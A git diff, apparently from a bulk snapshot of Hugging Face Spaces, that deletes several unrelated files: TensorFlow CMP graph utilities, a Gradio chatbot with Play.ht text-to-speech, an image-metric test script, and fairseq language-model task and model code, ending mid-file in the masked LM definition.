a/spaces/NCTCMumbai/NCTC/models/research/cognitive_mapping_and_planning/tfcode/cmp_utils.py b/spaces/NCTCMumbai/NCTC/models/research/cognitive_mapping_and_planning/tfcode/cmp_utils.py deleted file mode 100644 index 6d87c697b4b29128c8b8a42caac27aeb4d657ec6..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/research/cognitive_mapping_and_planning/tfcode/cmp_utils.py +++ /dev/null @@ -1,164 +0,0 @@ -# Copyright 2016 The TensorFlow Authors All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-# ============================================================================== - -"""Utility functions for setting up the CMP graph. -""" - -import os, numpy as np -import matplotlib.pyplot as plt - - -import tensorflow as tf - -from tensorflow.contrib import slim -from tensorflow.contrib.slim import arg_scope -import logging -from src import utils -import src.file_utils as fu -from tfcode import tf_utils - -resnet_v2 = tf_utils.resnet_v2 -custom_residual_block = tf_utils.custom_residual_block - -def value_iteration_network( - fr, num_iters, val_neurons, action_neurons, kernel_size, share_wts=False, - name='vin', wt_decay=0.0001, activation_fn=None, shape_aware=False): - """ - Constructs a Value Iteration Network, convolutions and max pooling across - channels. - Input: - fr: NxWxHxC - val_neurons: Number of channels for maintaining the value. - action_neurons: Computes action_neurons * val_neurons at each iteration to - max pool over. - Output: - value image: NxHxWx(val_neurons) - """ - init_var = np.sqrt(2.0/(kernel_size**2)/(val_neurons*action_neurons)) - vals = [] - with tf.variable_scope(name) as varscope: - if shape_aware == False: - fr_shape = tf.unstack(tf.shape(fr)) - val_shape = tf.stack(fr_shape[:-1] + [val_neurons]) - val = tf.zeros(val_shape, name='val_init') - else: - val = tf.expand_dims(tf.zeros_like(fr[:,:,:,0]), dim=-1) * \ - tf.constant(0., dtype=tf.float32, shape=[1,1,1,val_neurons]) - val_shape = tf.shape(val) - vals.append(val) - for i in range(num_iters): - if share_wts: - # The first Value Iteration maybe special, so it can have its own - # paramterss. - scope = 'conv' - if i == 0: scope = 'conv_0' - if i > 1: varscope.reuse_variables() - else: - scope = 'conv_{:d}'.format(i) - val = slim.conv2d(tf.concat([val, fr], 3, name='concat_{:d}'.format(i)), - num_outputs=action_neurons*val_neurons, - kernel_size=kernel_size, stride=1, activation_fn=activation_fn, - scope=scope, normalizer_fn=None, - weights_regularizer=slim.l2_regularizer(wt_decay), - weights_initializer=tf.random_normal_initializer(stddev=init_var), - biases_initializer=tf.zeros_initializer()) - val = tf.reshape(val, [-1, action_neurons*val_neurons, 1, 1], - name='re_{:d}'.format(i)) - val = slim.max_pool2d(val, kernel_size=[action_neurons,1], - stride=[action_neurons,1], padding='VALID', - scope='val_{:d}'.format(i)) - val = tf.reshape(val, val_shape, name='unre_{:d}'.format(i)) - vals.append(val) - return val, vals - - -def rotate_preds(loc_on_map, relative_theta, map_size, preds, - output_valid_mask): - with tf.name_scope('rotate'): - flow_op = tf_utils.get_flow(loc_on_map, relative_theta, map_size=map_size) - if type(preds) != list: - rotated_preds, valid_mask_warps = tf_utils.dense_resample(preds, flow_op, - output_valid_mask) - else: - rotated_preds = [] ;valid_mask_warps = [] - for pred in preds: - rotated_pred, valid_mask_warp = tf_utils.dense_resample(pred, flow_op, - output_valid_mask) - rotated_preds.append(rotated_pred) - valid_mask_warps.append(valid_mask_warp) - return rotated_preds, valid_mask_warps - -def get_visual_frustum(map_size, shape_like, expand_dims=[0,0]): - with tf.name_scope('visual_frustum'): - l = np.tril(np.ones(map_size)) ;l = l + l[:,::-1] - l = (l == 2).astype(np.float32) - for e in expand_dims: - l = np.expand_dims(l, axis=e) - confs_probs = tf.constant(l, dtype=tf.float32) - confs_probs = tf.ones_like(shape_like, dtype=tf.float32) * confs_probs - return confs_probs - -def deconv(x, is_training, wt_decay, neurons, strides, layers_per_block, - kernel_size, conv_fn, name, 
offset=0): - """Generates a up sampling network with residual connections. - """ - batch_norm_param = {'center': True, 'scale': True, - 'activation_fn': tf.nn.relu, - 'is_training': is_training} - outs = [] - for i, (neuron, stride) in enumerate(zip(neurons, strides)): - for s in range(layers_per_block): - scope = '{:s}_{:d}_{:d}'.format(name, i+1+offset,s+1) - x = custom_residual_block(x, neuron, kernel_size, stride, scope, - is_training, wt_decay, use_residual=True, - residual_stride_conv=True, conv_fn=conv_fn, - batch_norm_param=batch_norm_param) - stride = 1 - outs.append((x,True)) - return x, outs - -def fr_v2(x, output_neurons, inside_neurons, is_training, name='fr', - wt_decay=0.0001, stride=1, updates_collections=tf.GraphKeys.UPDATE_OPS): - """Performs fusion of information between the map and the reward map. - Inputs - x: NxHxWxC1 - - Outputs - fr map: NxHxWx(output_neurons) - """ - if type(stride) != list: - stride = [stride] - with slim.arg_scope(resnet_v2.resnet_utils.resnet_arg_scope( - is_training=is_training, weight_decay=wt_decay)): - with slim.arg_scope([slim.batch_norm], updates_collections=updates_collections) as arg_sc: - # Change the updates_collections for the conv normalizer_params to None - for i in range(len(arg_sc.keys())): - if 'convolution' in arg_sc.keys()[i]: - arg_sc.values()[i]['normalizer_params']['updates_collections'] = updates_collections - with slim.arg_scope(arg_sc): - bottleneck = resnet_v2.bottleneck - blocks = [] - for i, s in enumerate(stride): - b = resnet_v2.resnet_utils.Block( - 'block{:d}'.format(i + 1), bottleneck, [{ - 'depth': output_neurons, - 'depth_bottleneck': inside_neurons, - 'stride': stride[i] - }]) - blocks.append(b) - x, outs = resnet_v2.resnet_v2(x, blocks, num_classes=None, global_pool=False, - output_stride=None, include_root_block=False, - reuse=False, scope=name) - return x, outs diff --git a/spaces/Naveen618/mygenAIAvatharSpeech/app.py b/spaces/Naveen618/mygenAIAvatharSpeech/app.py deleted file mode 100644 index ca8b6d40b4ab898c70da92f4a4298de2baf703dc..0000000000000000000000000000000000000000 --- a/spaces/Naveen618/mygenAIAvatharSpeech/app.py +++ /dev/null @@ -1,164 +0,0 @@ -import os -import re -import requests -import json -import gradio as gr -from langchain.chat_models import ChatOpenAI -from langchain import LLMChain, PromptTemplate -from langchain.memory import ConversationBufferMemory - -OPENAI_API_KEY=os.getenv('OPENAI_API_KEY') -PLAY_HT_API_KEY=os.getenv('PLAY_HT_API_KEY') -PLAY_HT_USER_ID=os.getenv('PLAY_HT_USER_ID') - -PLAY_HT_VOICE_ID=os.getenv('PLAY_HT_VOICE_ID') -play_ht_api_get_audio_url = "https://play.ht/api/v2/tts" - - -template = """You are a helpful assistant to answer user queries. 
-{chat_history} -User: {user_message} -Chatbot:""" - -prompt = PromptTemplate( - input_variables=["chat_history", "user_message"], template=template -) - -memory = ConversationBufferMemory(memory_key="chat_history") - -llm_chain = LLMChain( - llm=ChatOpenAI(temperature='0.5', model_name="gpt-3.5-turbo"), - prompt=prompt, - verbose=True, - memory=memory, -) - -headers = { - "accept": "text/event-stream", - "content-type": "application/json", - "AUTHORIZATION": "Bearer "+ PLAY_HT_API_KEY, - "X-USER-ID": PLAY_HT_USER_ID -} - - -def get_payload(text): - return { - "text": text, - "voice": PLAY_HT_VOICE_ID, - "quality": "medium", - "output_format": "mp3", - "speed": 1, - "sample_rate": 24000, - "seed": None, - "temperature": None - } - -def get_generated_audio(text): - payload = get_payload(text) - generated_response = {} - try: - response = requests.post(play_ht_api_get_audio_url, json=payload, headers=headers) - response.raise_for_status() - generated_response["type"]= 'SUCCESS' - generated_response["response"] = response.text - except requests.exceptions.RequestException as e: - generated_response["type"]= 'ERROR' - try: - response_text = json.loads(response.text) - if response_text['error_message']: - generated_response["response"] = response_text['error_message'] - else: - generated_response["response"] = response.text - except Exception as e: - generated_response["response"] = response.text - except Exception as e: - generated_response["type"]= 'ERROR' - generated_response["response"] = response.text - return generated_response - -def extract_urls(text): - # Define the regex pattern for URLs - url_pattern = r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+[/\w\.-]*' - - # Find all occurrences of URLs in the text - urls = re.findall(url_pattern, text) - - return urls - -def get_audio_reply_for_question(text): - generated_audio_event = get_generated_audio(text) - #From get_generated_audio, you will get events in a string format, from that we need to extract the url - final_response = { - "audio_url": '', - "message": '' - } - if generated_audio_event["type"] == 'SUCCESS': - audio_urls = extract_urls(generated_audio_event["response"]) - if len(audio_urls) == 0: - final_response['message'] = "No audio file link found in generated event" - else: - final_response['audio_url'] = audio_urls[-1] - else: - final_response['message'] = generated_audio_event['response'] - return final_response - -def download_url(url): - try: - # Send a GET request to the URL to fetch the content - final_response = { - 'content':'', - 'error':'' - } - response = requests.get(url) - # Check if the request was successful (status code 200) - if response.status_code == 200: - final_response['content'] = response.content - else: - final_response['error'] = f"Failed to download the URL. Status code: {response.status_code}" - except Exception as e: - final_response['error'] = f"Failed to download the URL. 
Error: {e}" - return final_response - -def get_filename_from_url(url): - # Use os.path.basename() to extract the file name from the URL - file_name = os.path.basename(url) - return file_name - -def get_text_response(user_message): - response = llm_chain.predict(user_message = user_message) - return response - -def get_text_response_and_audio_response(user_message): - response = get_text_response(user_message) # Getting the reply from Open AI - audio_reply_for_question_response = get_audio_reply_for_question(response) - final_response = { - 'output_file_path': '', - 'message':'' - } - audio_url = audio_reply_for_question_response['audio_url'] - if audio_url: - output_file_path=get_filename_from_url(audio_url) - download_url_response = download_url(audio_url) - audio_content = download_url_response['content'] - if audio_content: - with open(output_file_path, "wb") as audio_file: - audio_file.write(audio_content) - final_response['output_file_path'] = output_file_path - else: - final_response['message'] = download_url_response['error'] - else: - final_response['message'] = audio_reply_for_question_response['message'] - return final_response - -def chat_bot_response(message, history): - text_and_audio_response = get_text_response_and_audio_response(message) - output_file_path = text_and_audio_response['output_file_path'] - if output_file_path: - return (text_and_audio_response['output_file_path'],) - else: - return text_and_audio_response['message'] - -demo = gr.ChatInterface(chat_bot_response,examples=["How are you doing?","What are your interests?","Which places do you like to visit?"]) - -if __name__ == "__main__": - demo.launch() #To create a public link, set `share=True` in `launch()`. To enable errors and logs, set `debug=True` in `launch()`. diff --git a/spaces/Nithila77/fashion-mnist/README.md b/spaces/Nithila77/fashion-mnist/README.md deleted file mode 100644 index 7ac637512df6a46fab7d5dfa1d98211228e614f7..0000000000000000000000000000000000000000 --- a/spaces/Nithila77/fashion-mnist/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Fashion Search -emoji: ⚡ -colorFrom: indigo -colorTo: blue -sdk: gradio -sdk_version: 3.11.0 -app_file: app.py -pinned: false -license: gpl-3.0 -duplicated_from: mattmdjaga/fashion_search ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Notmodern/andite-anything-v4.0/app.py b/spaces/Notmodern/andite-anything-v4.0/app.py deleted file mode 100644 index 47a2051db6dadeea03edf70d62694fd3e5e88ba7..0000000000000000000000000000000000000000 --- a/spaces/Notmodern/andite-anything-v4.0/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/andite/anything-v4.0").launch() \ No newline at end of file diff --git a/spaces/OAOA/DifFace/basicsr/metrics/test_metrics/test_psnr_ssim.py b/spaces/OAOA/DifFace/basicsr/metrics/test_metrics/test_psnr_ssim.py deleted file mode 100644 index 18b05a73a0e38e89b2321ddc9415123a92f5c5a4..0000000000000000000000000000000000000000 --- a/spaces/OAOA/DifFace/basicsr/metrics/test_metrics/test_psnr_ssim.py +++ /dev/null @@ -1,52 +0,0 @@ -import cv2 -import torch - -from basicsr.metrics import calculate_psnr, calculate_ssim -from basicsr.metrics.psnr_ssim import calculate_psnr_pt, calculate_ssim_pt -from basicsr.utils import img2tensor - - -def test(img_path, img_path2, crop_border, test_y_channel=False): - img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED) - img2 = cv2.imread(img_path2, cv2.IMREAD_UNCHANGED) - - # --------------------- 
Numpy --------------------- - psnr = calculate_psnr(img, img2, crop_border=crop_border, input_order='HWC', test_y_channel=test_y_channel) - ssim = calculate_ssim(img, img2, crop_border=crop_border, input_order='HWC', test_y_channel=test_y_channel) - print(f'\tNumpy\tPSNR: {psnr:.6f} dB, \tSSIM: {ssim:.6f}') - - # --------------------- PyTorch (CPU) --------------------- - img = img2tensor(img / 255., bgr2rgb=True, float32=True).unsqueeze_(0) - img2 = img2tensor(img2 / 255., bgr2rgb=True, float32=True).unsqueeze_(0) - - psnr_pth = calculate_psnr_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - ssim_pth = calculate_ssim_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - print(f'\tTensor (CPU) \tPSNR: {psnr_pth[0]:.6f} dB, \tSSIM: {ssim_pth[0]:.6f}') - - # --------------------- PyTorch (GPU) --------------------- - img = img.cuda() - img2 = img2.cuda() - psnr_pth = calculate_psnr_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - ssim_pth = calculate_ssim_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - print(f'\tTensor (GPU) \tPSNR: {psnr_pth[0]:.6f} dB, \tSSIM: {ssim_pth[0]:.6f}') - - psnr_pth = calculate_psnr_pt( - torch.repeat_interleave(img, 2, dim=0), - torch.repeat_interleave(img2, 2, dim=0), - crop_border=crop_border, - test_y_channel=test_y_channel) - ssim_pth = calculate_ssim_pt( - torch.repeat_interleave(img, 2, dim=0), - torch.repeat_interleave(img2, 2, dim=0), - crop_border=crop_border, - test_y_channel=test_y_channel) - print(f'\tTensor (GPU batch) \tPSNR: {psnr_pth[0]:.6f}, {psnr_pth[1]:.6f} dB,' - f'\tSSIM: {ssim_pth[0]:.6f}, {ssim_pth[1]:.6f}') - - -if __name__ == '__main__': - test('tests/data/bic/baboon.png', 'tests/data/gt/baboon.png', crop_border=4, test_y_channel=False) - test('tests/data/bic/baboon.png', 'tests/data/gt/baboon.png', crop_border=4, test_y_channel=True) - - test('tests/data/bic/comic.png', 'tests/data/gt/comic.png', crop_border=4, test_y_channel=False) - test('tests/data/bic/comic.png', 'tests/data/gt/comic.png', crop_border=4, test_y_channel=True) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/truncated_bptt/truncated_bptt_lm_task.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/truncated_bptt/truncated_bptt_lm_task.py deleted file mode 100644 index 02be0e7fb4213b98798c85b79e9046e9990b97fc..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/truncated_bptt/truncated_bptt_lm_task.py +++ /dev/null @@ -1,281 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import logging -import os -from dataclasses import dataclass, field -from typing import List, Optional, Tuple - -import torch -from fairseq import utils -from fairseq.data import ( - Dictionary, - TokenBlockDataset, - data_utils, - iterators, -) -from fairseq.dataclass import FairseqDataclass -from fairseq.distributed import utils as dist_utils -from fairseq.tasks import FairseqTask, register_task -from omegaconf import II - - -logger = logging.getLogger(__name__) - - -@dataclass -class TruncatedBPTTLMConfig(FairseqDataclass): - data: str = field(default="???", metadata={"help": "path to data directory"}) - tokens_per_sample: int = field( - default=1024, - metadata={"help": "max number of tokens per sequence"}, - ) - batch_size: int = II("dataset.batch_size") - # Some models use *max_target_positions* to know how many positional - # embeddings to learn. We use II(...) to make it default to - # *tokens_per_sample*, but in principle there could be more positional - # embeddings than tokens in a single batch. This may also be irrelevant for - # custom model implementations. - max_target_positions: int = II("task.tokens_per_sample") - # these will be populated automatically if not provided - data_parallel_rank: Optional[int] = None - data_parallel_size: Optional[int] = None - - -@register_task("truncated_bptt_lm", dataclass=TruncatedBPTTLMConfig) -class TruncatedBPTTLMTask(FairseqTask): - def __init__(self, cfg: TruncatedBPTTLMConfig): - super().__init__(cfg) - - if cfg.data_parallel_rank is None or cfg.data_parallel_size is None: - if torch.distributed.is_initialized(): - cfg.data_parallel_rank = dist_utils.get_data_parallel_rank() - cfg.data_parallel_size = dist_utils.get_data_parallel_world_size() - else: - cfg.data_parallel_rank = 0 - cfg.data_parallel_size = 1 - - # load the dictionary - paths = utils.split_paths(cfg.data) - assert len(paths) > 0 - self.dictionary = Dictionary.load(os.path.join(paths[0], "dict.txt")) - logger.info("dictionary: {} types".format(len(self.dictionary))) - - def load_dataset(self, split, epoch=1, combine=False, **kwargs): - """Load a given dataset split (e.g., train, valid, test)""" - - # support sharded datasets - paths = utils.split_paths(self.cfg.data) - assert len(paths) > 0 - data_path = paths[(epoch - 1) % len(paths)] - split_path = os.path.join(data_path, split) - - # each element of *data* will be a tensorized line from the original - # text dataset, similar to ``open(split_path).readlines()`` - data = data_utils.load_indexed_dataset( - split_path, self.dictionary, combine=combine - ) - if data is None: - raise FileNotFoundError( - "Dataset not found: {} ({})".format(split, split_path) - ) - - # this is similar to ``data.view(-1).split(tokens_per_sample)`` - data = TokenBlockDataset( - data, - data.sizes, - block_size=self.cfg.tokens_per_sample, - pad=None, # unused - eos=None, # unused - break_mode="none", - ) - - self.datasets[split] = TruncatedBPTTDataset( - data=data, - bsz_per_shard=self.cfg.batch_size, - shard_id=self.cfg.data_parallel_rank, - num_shards=self.cfg.data_parallel_size, - ) - - def dataset(self, split): - return self.datasets[split] - - def get_batch_iterator( - self, dataset, num_workers=0, epoch=1, data_buffer_size=0, **kwargs - ): - return iterators.EpochBatchIterator( - dataset=dataset, - collate_fn=self._collate_fn, - num_workers=num_workers, - epoch=epoch, - buffer_size=data_buffer_size, - # we don't use the batching functionality from EpochBatchIterator; - # instead every item in *dataset* is a whole batch - 
batch_sampler=[[i] for i in range(len(dataset))], - disable_shuffling=True, - ) - - def _collate_fn(self, items: List[List[torch.Tensor]]): - # we don't use fairseq's batching functionality, so we expect a single - # Tensor of type List[torch.Tensor] - assert len(items) == 1 - - # item will have shape B x T (the last batch may have length < T) - id, item = items[0] - item = data_utils.collate_tokens(item, pad_idx=self.source_dictionary.pad()) - B, T = item.size() - - # shift item one position over and append a padding token for the target - target = torch.nn.functional.pad( - item[:, 1:], (0, 1, 0, 0), value=self.target_dictionary.pad() - ) - - # fairseq expects batches to have the following structure - return { - "id": torch.tensor([id]*item.size(0)), - "net_input": { - "src_tokens": item, - }, - "target": target, - "nsentences": item.size(0), - "ntokens": item.numel(), - } - - def build_dataset_for_inference( - self, src_tokens: List[torch.Tensor], src_lengths: List[int], **kwargs - ) -> torch.utils.data.Dataset: - eos = self.source_dictionary.eos() - dataset = TokenBlockDataset( - src_tokens, - src_lengths, - block_size=None, # ignored for "eos" break mode - pad=self.source_dictionary.pad(), - eos=eos, - break_mode="eos", - ) - - class Dataset(torch.utils.data.Dataset): - def __getitem__(self, i): - item = dataset[i] - if item[-1] == eos: - # remove eos to support generating with a prefix - item = item[:-1] - return (i, [item]) - - def __len__(self): - return len(dataset) - - return Dataset() - - def inference_step( - self, generator, models, sample, prefix_tokens=None, constraints=None - ): - with torch.no_grad(): - if constraints is not None: - raise NotImplementedError - - # SequenceGenerator doesn't use *src_tokens* directly, we need to - # pass the *prefix_tokens* argument instead. - if prefix_tokens is None and sample["net_input"]["src_tokens"].nelement(): - prefix_tokens = sample["net_input"]["src_tokens"] - - # begin generation with the end-of-sentence token - bos_token = self.source_dictionary.eos() - - return generator.generate( - models, sample, prefix_tokens=prefix_tokens, bos_token=bos_token - ) - - def eval_lm_dataloader( - self, - dataset, - max_tokens: Optional[int] = 36000, - batch_size: Optional[int] = None, - max_positions: Optional[int] = None, - num_shards: int = 1, - shard_id: int = 0, - num_workers: int = 1, - data_buffer_size: int = 10, - context_window: int = 0, - ): - if context_window > 0: - raise NotImplementedError( - "Transformer-XL doesn't need --context-window, try " - "--model-overrides '{\"mem_len\":42}' instead " - ) - return self.get_batch_iterator( - dataset=dataset, - max_tokens=max_tokens, - max_sentences=batch_size, - max_positions=max_positions, - ignore_invalid_inputs=True, - num_shards=num_shards, - shard_id=shard_id, - num_workers=num_workers, - data_buffer_size=data_buffer_size, - ).next_epoch_itr(shuffle=False) - - @property - def source_dictionary(self): - return self.dictionary - - @property - def target_dictionary(self): - return self.dictionary - - -class TruncatedBPTTDataset(torch.utils.data.Dataset): - def __init__( - self, - data: List[torch.Tensor], # ordered list of items - bsz_per_shard, # number of items processed per GPUs per forward - shard_id, # current GPU ID - num_shards, # number of GPUs - ): - super().__init__() - self.data = data - - def batchify(data, bsz): - # Work out how cleanly we can divide the dataset into bsz parts. 
- nbatch = data.size(0) // bsz - # Trim off any extra elements that wouldn't cleanly fit (remainders). - data = data.narrow(0, 0, nbatch * bsz) - # Evenly divide the data across the bsz batches. - data = data.view(bsz, -1).contiguous() - return data - - # total number of sequences processed by all GPUs in each forward pass - global_batch_size = bsz_per_shard * num_shards - - """ - With a 16 item dataset, bsz_per_shard=2 and num_shards=3, - *indices* might look like: - - indices = [[0, 1], - [2, 3], - [4, 5], - [6, 7], - [8, 9], - [10, 11]] - - The size of the TruncatedBPTTDataset instance will be 2, - and shard 1 will see items: - - [(0, [data[4], data[6]]), - (1, [data[5], data[7]])] - """ - indices = batchify(torch.arange(len(data)), global_batch_size) - assert indices.size(0) == global_batch_size - - self.my_indices = indices[ - shard_id * bsz_per_shard : (shard_id + 1) * bsz_per_shard - ] - assert self.my_indices.size(0) == bsz_per_shard - - def __len__(self): - return self.my_indices.size(1) - - def __getitem__(self, i) -> Tuple[int, List[torch.Tensor]]: - return (i, [self.data[idx] for idx in self.my_indices[:, i]]) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/__init__.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/masked_lm.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/masked_lm.py deleted file mode 100644 index 5cb49dd77cc3514e6c1383c4286e90979f6edb34..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/masked_lm.py +++ /dev/null @@ -1,404 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import utils -from fairseq.models import ( - FairseqEncoder, - FairseqEncoderModel, - register_model, - register_model_architecture, -) -from fairseq.modules import ( - LayerNorm, - SinusoidalPositionalEmbedding, - TransformerSentenceEncoder, -) -from fairseq.modules.transformer_sentence_encoder import init_bert_params -from fairseq.utils import safe_hasattr - - -logger = logging.getLogger(__name__) - - -@register_model("masked_lm") -class MaskedLMModel(FairseqEncoderModel): - """ - Class for training a Masked Language Model. It also supports an - additional sentence level prediction if the sent-loss argument is set. - """ - - def __init__(self, args, encoder): - super().__init__(encoder) - self.args = args - - # if specified then apply bert initialization on the model. 
We need - # to explictly call this to make sure that the output embeddings - # and projection layers are also correctly initialized - if getattr(args, "apply_bert_init", False): - self.apply(init_bert_params) - - @staticmethod - def add_args(parser): - """Add model-specific arguments to the parser.""" - # Arguments related to dropout - parser.add_argument( - "--dropout", type=float, metavar="D", help="dropout probability" - ) - parser.add_argument( - "--attention-dropout", - type=float, - metavar="D", - help="dropout probability for" " attention weights", - ) - parser.add_argument( - "--act-dropout", - type=float, - metavar="D", - help="dropout probability after" " activation in FFN", - ) - - # Arguments related to hidden states and self-attention - parser.add_argument( - "--encoder-ffn-embed-dim", - type=int, - metavar="N", - help="encoder embedding dimension for FFN", - ) - parser.add_argument( - "--encoder-layers", type=int, metavar="N", help="num encoder layers" - ) - parser.add_argument( - "--encoder-attention-heads", - type=int, - metavar="N", - help="num encoder attention heads", - ) - - # Arguments related to input and output embeddings - parser.add_argument( - "--encoder-embed-dim", - type=int, - metavar="N", - help="encoder embedding dimension", - ) - parser.add_argument( - "--share-encoder-input-output-embed", - action="store_true", - help="share encoder input" " and output embeddings", - ) - parser.add_argument( - "--encoder-learned-pos", - action="store_true", - help="use learned positional embeddings in the encoder", - ) - parser.add_argument( - "--no-token-positional-embeddings", - action="store_true", - help="if set, disables positional embeddings" " (outside self attention)", - ) - parser.add_argument( - "--num-segment", type=int, metavar="N", help="num segment in the input" - ) - parser.add_argument( - "--max-positions", type=int, help="number of positional embeddings to learn" - ) - - # Arguments related to sentence level prediction - parser.add_argument( - "--sentence-class-num", - type=int, - metavar="N", - help="number of classes for sentence task", - ) - parser.add_argument( - "--sent-loss", - action="store_true", - help="if set," " calculate sentence level predictions", - ) - - # Arguments related to parameter initialization - parser.add_argument( - "--apply-bert-init", - action="store_true", - help="use custom param initialization for BERT", - ) - - # misc params - parser.add_argument( - "--activation-fn", - choices=utils.get_available_activation_fns(), - help="activation function to use", - ) - parser.add_argument( - "--pooler-activation-fn", - choices=utils.get_available_activation_fns(), - help="Which activation function to use for pooler layer.", - ) - parser.add_argument( - "--encoder-normalize-before", - action="store_true", - help="apply layernorm before each encoder block", - ) - - def forward(self, src_tokens, segment_labels=None, **kwargs): - return self.encoder(src_tokens, segment_labels=segment_labels, **kwargs) - - def max_positions(self): - return self.encoder.max_positions - - @classmethod - def build_model(cls, args, task): - """Build a new model instance.""" - # make sure all arguments are present in older models - base_architecture(args) - - if not safe_hasattr(args, "max_positions"): - args.max_positions = args.tokens_per_sample - - logger.info(args) - - encoder = MaskedLMEncoder(args, task.dictionary) - return cls(args, encoder) - - -class MaskedLMEncoder(FairseqEncoder): - """ - Encoder for Masked Language Modelling. 
- """ - - def __init__(self, args, dictionary): - super().__init__(dictionary) - - self.padding_idx = dictionary.pad() - self.vocab_size = dictionary.__len__() - self.max_positions = args.max_positions - - self.sentence_encoder = TransformerSentenceEncoder( - padding_idx=self.padding_idx, - vocab_size=self.vocab_size, - num_encoder_layers=args.encoder_layers, - embedding_dim=args.encoder_embed_dim, - ffn_embedding_dim=args.encoder_ffn_embed_dim, - num_attention_heads=args.encoder_attention_heads, - dropout=args.dropout, - attention_dropout=args.attention_dropout, - activation_dropout=args.act_dropout, - max_seq_len=self.max_positions, - num_segments=args.num_segment, - use_position_embeddings=not args.no_token_positional_embeddings, - encoder_normalize_before=args.encoder_normalize_before, - apply_bert_init=args.apply_bert_init, - activation_fn=args.activation_fn, - learned_pos_embedding=args.encoder_learned_pos, - ) - - self.share_input_output_embed = args.share_encoder_input_output_embed - self.embed_out = None - self.sentence_projection_layer = None - self.sentence_out_dim = args.sentence_class_num - self.lm_output_learned_bias = None - - # Remove head is set to true during fine-tuning - self.load_softmax = not getattr(args, "remove_head", False) - - self.masked_lm_pooler = nn.Linear( - args.encoder_embed_dim, args.encoder_embed_dim - ) - self.pooler_activation = utils.get_activation_fn(args.pooler_activation_fn) - - self.lm_head_transform_weight = nn.Linear( - args.encoder_embed_dim, args.encoder_embed_dim - ) - self.activation_fn = utils.get_activation_fn(args.activation_fn) - self.layer_norm = LayerNorm(args.encoder_embed_dim) - - self.lm_output_learned_bias = None - if self.load_softmax: - self.lm_output_learned_bias = nn.Parameter(torch.zeros(self.vocab_size)) - - if not self.share_input_output_embed: - self.embed_out = nn.Linear( - args.encoder_embed_dim, self.vocab_size, bias=False - ) - - if args.sent_loss: - self.sentence_projection_layer = nn.Linear( - args.encoder_embed_dim, self.sentence_out_dim, bias=False - ) - - def forward(self, src_tokens, segment_labels=None, masked_tokens=None, **unused): - """ - Forward pass for Masked LM encoder. This first computes the token - embedding using the token embedding matrix, position embeddings (if - specified) and segment embeddings (if specified). - - Here we assume that the sentence representation corresponds to the - output of the classification_token (see bert_task or cross_lingual_lm - task for more details). - Args: - - src_tokens: B x T matrix representing sentences - - segment_labels: B x T matrix representing segment label for tokens - Returns: - - a tuple of the following: - - logits for predictions in format B x T x C to be used in - softmax afterwards - - a dictionary of additional data, where 'pooled_output' contains - the representation for classification_token and 'inner_states' - is a list of internal model states used to compute the - predictions (similar in ELMO). 'sentence_logits' - is the prediction logit for NSP task and is only computed if - this is specified in the input arguments. 
- """ - - inner_states, sentence_rep = self.sentence_encoder( - src_tokens, - segment_labels=segment_labels, - ) - - x = inner_states[-1].transpose(0, 1) - # project masked tokens only - if masked_tokens is not None: - x = x[masked_tokens, :] - x = self.layer_norm(self.activation_fn(self.lm_head_transform_weight(x))) - - pooled_output = self.pooler_activation(self.masked_lm_pooler(sentence_rep)) - - # project back to size of vocabulary - if self.share_input_output_embed and hasattr( - self.sentence_encoder.embed_tokens, "weight" - ): - x = F.linear(x, self.sentence_encoder.embed_tokens.weight) - elif self.embed_out is not None: - x = self.embed_out(x) - if self.lm_output_learned_bias is not None: - x = x + self.lm_output_learned_bias - sentence_logits = None - if self.sentence_projection_layer: - sentence_logits = self.sentence_projection_layer(pooled_output) - - return x, { - "inner_states": inner_states, - "pooled_output": pooled_output, - "sentence_logits": sentence_logits, - } - - def max_positions(self): - """Maximum output length supported by the encoder.""" - return self.max_positions - - def upgrade_state_dict_named(self, state_dict, name): - if isinstance( - self.sentence_encoder.embed_positions, SinusoidalPositionalEmbedding - ): - state_dict[ - name + ".sentence_encoder.embed_positions._float_tensor" - ] = torch.FloatTensor(1) - if not self.load_softmax: - for k in list(state_dict.keys()): - if ( - "embed_out.weight" in k - or "sentence_projection_layer.weight" in k - or "lm_output_learned_bias" in k - ): - del state_dict[k] - return state_dict - - -@register_model_architecture("masked_lm", "masked_lm") -def base_architecture(args): - args.dropout = getattr(args, "dropout", 0.1) - args.attention_dropout = getattr(args, "attention_dropout", 0.1) - args.act_dropout = getattr(args, 